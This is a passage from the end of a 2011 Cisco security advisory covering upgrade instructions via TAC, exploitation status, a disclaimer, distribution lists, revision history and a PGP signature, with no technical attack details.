Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability described in this advisory. This vulnerability was found during internal testing. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at: http://www.cisco.com/warp/public/707/cisco-sa-20110330-acs.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-bulletins@lists.first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +------------------------------------------------------------+ | Revision 1.0 | 2011-March-30 | Initial public release. | +------------------------------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt. +-------------------------------------------------------------------- Copyright 2010-2011 Cisco Systems, Inc. All rights reserved. +-------------------------------------------------------------------- Updated: Mar 30, 2011 Document ID: 112913 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iF4EAREIAAYFAk2TR14ACgkQQXnnBKKRMNBJ/QD/UfAf8bg3i7og/U7d0WVTQX6p 33sdmFcCI5RvrbqXIVAA/10DfgXyajCCY0vL+gNCFwIu+7gONOvksL1/8wcdWmOa =7sC3 -----END PGP SIGNATURE-----